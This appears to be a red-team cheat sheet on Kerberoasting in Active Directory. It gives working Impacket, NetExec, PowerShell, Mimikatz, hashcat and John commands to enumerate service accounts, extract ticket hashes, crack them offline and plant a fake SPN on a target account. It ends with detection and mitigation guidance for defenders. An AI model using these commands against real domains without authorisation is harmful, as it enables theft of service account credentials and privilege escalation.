Kerberoasting

Overview

Kerberoasting requests service tickets (TGS) for accounts that have Service Principal Names (SPNs) and cracks them offline. Any authenticated domain user can request a service ticket for any SPN; part of that ticket is encrypted with a key derived from the service account's password, so a weak password can be recovered by offline guessing without ever touching the service itself. The highest-value targets are service accounts that hold admin privileges.

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting

Prerequisites

  • Valid domain credentials (any domain user)
  • Network access to a Domain Controller (port 88 Kerberos)

Techniques

Enumerate Kerberoastable Accounts

# Impacket
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip>

# With NTLM hash (pass-the-hash)
impacket-GetUserSPNs '<domain>/<user>' -hashes ':<ntlm_hash>' -dc-ip <dc_ip>

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting output.txt

Request and Extract Hashes

# Impacket — request TGS hashes for all kerberoastable accounts
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request

# Save hashes to file
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request -outputfile kerberoast.txt

# Target a specific SPN
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request-user <target_user>

From Windows:

# Request TGS tickets using .NET
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db.domain.local:1433"

# Export tickets from memory with Mimikatz
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
mimikatz# kerberos::list /export

Crack Kerberoast Hashes

# Hashcat
# https://github.com/hashcat/hashcat

# Kerberoast TGS-REP (RC4 / etype 23) — mode 13100
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

# Kerberoast TGS-REP (AES256 / etype 18) — mode 19700
hashcat -m 19700 kerberoast.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best66.rule

# John the Ripper
# https://github.com/openwall/john
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted Kerberoasting

If you have write access to an account's servicePrincipalName attribute, you can set an SPN on a high-value account and then Kerberoast it:

# Set SPN on a target account (requires write access to the SPN attribute)
# PowerShell
Set-ADUser -Identity <target_user> -ServicePrincipalNames @{Add='fake/spn'}

# Then Kerberoast the target
# Impacket
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request-user <target_user>

Detection Methods

Network-Based Detection

  • Spike in TGS-REQ requests from a single source for multiple SPNs
  • TGS requests for services the requesting user doesn't normally access

Host-Based Detection

  • Windows Security Event 4769 (Kerberos Service Ticket Operations) — look for RC4 encryption type (0x17) which is weaker and commonly requested during Kerberoasting
  • High volume of 4769 events from a single user in a short time period

Mitigation Strategies

  • Strong service account passwords — use 25+ character random passwords for service accounts
  • Group Managed Service Accounts (gMSA) — automatically rotated 256-character random passwords that cannot be Kerberoasted practically
  • AES encryption — disable RC4 and enforce AES for Kerberos tickets (harder to crack)
  • Monitor Kerberos traffic — alert on unusual TGS request patterns

References

Official Documentation

MITRE ATT&CK